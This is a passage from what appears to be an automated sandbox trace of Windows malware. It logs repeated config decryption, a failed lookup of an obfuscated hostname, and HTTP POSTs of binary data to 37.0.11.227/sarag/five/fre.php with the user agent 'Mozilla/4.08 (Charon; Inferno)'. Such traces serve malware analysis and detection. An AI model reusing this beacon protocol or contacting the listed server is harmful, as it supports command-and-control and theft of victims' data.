ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0179.303] GetProcessHeap () returned 0x690000 [0179.303] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0179.303] GetProcessHeap () returned 0x690000 [0179.303] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0179.304] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0179.305] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0179.305] GetProcessHeap () returned 0x690000 [0179.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a92a0 [0179.305] GetProcessHeap () returned 0x690000 [0179.305] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0179.305] GetProcessHeap () returned 0x690000 [0179.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0179.305] GetProcessHeap () returned 0x690000 [0179.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0179.306] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0179.307] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0179.307] GetProcessHeap () returned 0x690000 [0179.307] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0179.307] GetProcessHeap () returned 0x690000 [0179.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0179.307] send (s=0x2c8, buf=0x6abd08*, len=242, flags=0) returned 242 [0179.308] send (s=0x2c8, buf=0x6aba40*, len=159, flags=0) returned 159 [0179.308] GetProcessHeap () returned 0x690000 [0179.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6af418 [0179.308] recv (in: s=0x2c8, buf=0x6af418, len=4048, flags=0 | out: buf=0x6af418*) returned 204 [0179.384] GetProcessHeap () returned 0x690000 [0179.385] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0179.385] GetProcessHeap () returned 0x690000 [0179.385] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0179.385] GetProcessHeap () returned 0x690000 [0179.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a92a0 | out: hHeap=0x690000) returned 1 [0179.386] GetProcessHeap () returned 0x690000 [0179.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0179.386] closesocket (s=0x2c8) returned 0 [0179.386] GetProcessHeap () returned 0x690000 [0179.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0179.386] GetProcessHeap () returned 0x690000 [0179.387] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0179.387] GetProcessHeap () returned 0x690000 [0179.387] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0179.387] GetProcessHeap () returned 0x690000 [0179.387] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0179.388] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6af418, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x300) returned 0x2c8 [0179.389] Sleep (dwMilliseconds=0xea60) [0179.391] GetProcessHeap () returned 0x690000 [0179.391] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0179.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.392] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.402] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0179.416] GetProcessHeap () returned 0x690000 [0179.416] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0179.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.418] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0179.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.419] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.420] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.420] GetProcessHeap () returned 0x690000 [0179.420] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0179.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.421] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0179.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.422] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0179.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.423] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0179.423] GetProcessHeap () returned 0x690000 [0179.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0179.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.426] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0179.429] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.429] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0179.430] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.430] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0179.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.431] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0179.431] GetProcessHeap () returned 0x690000 [0179.431] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0179.432] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0179.432] GetProcessHeap () returned 0x690000 [0179.432] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0179.432] GetProcessHeap () returned 0x690000 [0179.433] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0179.433] GetProcessHeap () returned 0x690000 [0179.433] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0179.433] GetProcessHeap () returned 0x690000 [0179.433] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0179.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.435] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.443] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0179.450] GetProcessHeap () returned 0x690000 [0179.450] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0179.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.451] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0179.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.452] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.453] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.453] GetProcessHeap () returned 0x690000 [0179.454] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0179.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.455] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0179.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.456] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0179.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.457] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0179.457] GetProcessHeap () returned 0x690000 [0179.457] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0179.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.459] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0179.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.460] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0179.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.465] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0179.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.466] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0179.466] GetProcessHeap () returned 0x690000 [0179.466] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0179.466] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ade00*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0179.466] GetProcessHeap () returned 0x690000 [0179.466] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4a0 [0179.466] socket (af=2, type=1, protocol=6) returned 0x2cc [0179.467] connect (s=0x2cc, name=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0179.492] FreeAddrInfoW (pAddrInfo=0x6ade00*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0179.492] GetProcessHeap () returned 0x690000 [0179.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0179.492] GetProcessHeap () returned 0x690000 [0179.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0179.493] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0179.494] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0179.494] GetProcessHeap () returned 0x690000 [0179.494] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a92a0 [0179.494] GetProcessHeap () returned 0x690000 [0179.494] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0179.495] GetProcessHeap () returned 0x690000 [0179.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0179.495] GetProcessHeap () returned 0x690000 [0179.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0179.495] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0179.496] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0179.496] GetProcessHeap () returned 0x690000 [0179.496] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0179.496] GetProcessHeap () returned 0x690000 [0179.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0179.497] send (s=0x2cc, buf=0x6abd08*, len=242, flags=0) returned 242 [0179.497] send (s=0x2cc, buf=0x6aba40*, len=159, flags=0) returned 159 [0179.498] GetProcessHeap () returned 0x690000 [0179.498] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6af418 [0179.498] recv (in: s=0x2cc, buf=0x6af418, len=4048, flags=0 | out: buf=0x6af418*) returned 204 [0179.584] GetProcessHeap () returned 0x690000 [0179.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0179.584] GetProcessHeap () returned 0x690000 [0179.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0179.584] GetProcessHeap () returned 0x690000 [0179.585] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a92a0 | out: hHeap=0x690000) returned 1 [0179.585] GetProcessHeap () returned 0x690000 [0179.585] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0179.585] closesocket (s=0x2cc) returned 0 [0179.586] GetProcessHeap () returned 0x690000 [0179.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4a0 | out: hHeap=0x690000) returned 1 [0179.587] GetProcessHeap () returned 0x690000 [0179.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0179.587] GetProcessHeap () returned 0x690000 [0179.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0179.588] GetProcessHeap () returned 0x690000 [0179.588] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0179.588] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6af418, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xecc) returned 0x2cc [0179.590] Sleep (dwMilliseconds=0xea60) [0179.594] GetProcessHeap () returned 0x690000 [0179.594] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0179.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.595] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.601] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0179.609] GetProcessHeap () returned 0x690000 [0179.609] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0179.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.611] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0179.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.612] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.615] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.615] GetProcessHeap () returned 0x690000 [0179.615] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0179.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.617] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0179.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.618] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0179.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.620] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0179.620] GetProcessHeap () returned 0x690000 [0179.620] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0179.620] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.621] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0179.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.624] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0179.627] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.628] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0179.628] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.629] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0179.629] GetProcessHeap () returned 0x690000 [0179.629] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0179.629] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0179.629] GetProcessHeap () returned 0x690000 [0179.629] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0179.630] GetProcessHeap () returned 0x690000 [0179.630] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0179.630] GetProcessHeap () returned 0x690000 [0179.631] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0179.631] GetProcessHeap () returned 0x690000 [0179.631] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0179.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.632] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.640] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0179.649] GetProcessHeap () returned 0x690000 [0179.649] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0179.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.650] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0179.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.651] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.652] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.652] GetProcessHeap () returned 0x690000 [0179.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0179.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.654] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0179.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.655] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0179.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.657] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0179.657] GetProcessHeap () returned 0x690000 [0179.657] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0179.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.727] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0179.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.730] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0179.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.731] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0179.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.732] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0179.732] GetProcessHeap () returned 0x690000 [0179.732] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0179.732] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9e60*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0179.732] GetProcessHeap () returned 0x690000 [0179.732] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0179.732] socket (af=2, type=1, protocol=6) returned 0x2d0 [0179.733] connect (s=0x2d0, name=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0179.756] FreeAddrInfoW (pAddrInfo=0x6a9e60*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0179.756] GetProcessHeap () returned 0x690000 [0179.756] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0179.756] GetProcessHeap () returned 0x690000 [0179.756] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0179.756] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0179.759] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0179.759] GetProcessHeap () returned 0x690000 [0179.759] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a92a0 [0179.759] GetProcessHeap () returned 0x690000 [0179.760] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0179.760] GetProcessHeap () returned 0x690000 [0179.760] 